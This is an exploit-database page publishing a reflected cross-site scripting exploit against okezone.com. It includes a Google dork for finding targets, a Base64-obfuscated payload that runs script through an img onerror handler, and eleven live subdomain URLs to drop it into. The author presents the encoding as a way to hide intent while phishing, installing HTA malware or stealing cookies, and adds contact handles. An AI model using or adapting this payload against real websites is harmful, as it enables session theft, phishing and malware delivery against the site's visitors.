Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-79 | Not specified | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
N/A | High | Remote | 2021-04-09 |
############################################################# # Exploit Title: Custom CMS Okezone - Cross-Site Scripting Vulnerabilities # Exploit Author: Gh05t666nero # Author Team: IndoGhostSec # Google Dork: site:*.okezone.com/rc.php?id= # Software Vendor: allinurl:okezone.com/rc.php?id= # Software Version: N/A # Software Link: N/A # Tested on: Linux gh05t666nero 5.10.0-kali2-686-pae #1 SMP Debian 5.10.9-1kali1 (2021-01-22) i686 GNU/Linux # Date: 2021-04-09 ############################################################# [*] Information: XSS vulnerability in this time is a little different because we have to encrypt the XSS Payload to Base64 so that this can be an opportunity for a hacker to cover up the user's suspicions when he (the hacker) wants to execute his target, whether it's Spread Phishing, installing HTA malware, stealing cookies, and etc. ############################################################# [*] Exploit: WFNTLSstR2gwNXQ2NjZuZXJvPC90aXRsZT48aW1nIG9uZXJyb3I9ImxvY2F0aW9uPSdqYXZhc2NyaXB0Olx4MjU1Q3UwMDYxbGVydChkb2N1bWVudC5kb21haW4pJyIgc3JjPSJ4IiA+ ############################################################# [*] Demo: https://sports.okezone.com/rc.php?id=[EXPLOIT] https://economy.okezone.com/rc.php?id=[EXPLOIT] https://lifestyle.okezone.com/rc.php?id=[EXPLOIT] https://celebrity.okezone.com/rc.php?id=[EXPLOIT] https://techno.okezone.com/rc.php?id=[EXPLOIT] https://news.okezone.com/rc.php?id=[EXPLOIT] https://otomotif.okezone.com/rc.php?id=[EXPLOIT] https://lifestyle.okezone.com/rc.php?id=[EXPLOIT] https://travel.okezone.com/rc.php?id=[EXPLOIT] https://video.okezone.com/rc.php?id=[EXPLOIT] https://muslim.okezone.com/rc.php?id=[EXPLOIT] ############################################################# [*] Contact: # Instagram: instagram.com/ojan.py # Telegram : t.me/Gh05t666nero # Twitter: twitter.com/Gh05t666nero1 # E-mail : [email protected]
Copyright ©2024 Exploitalert.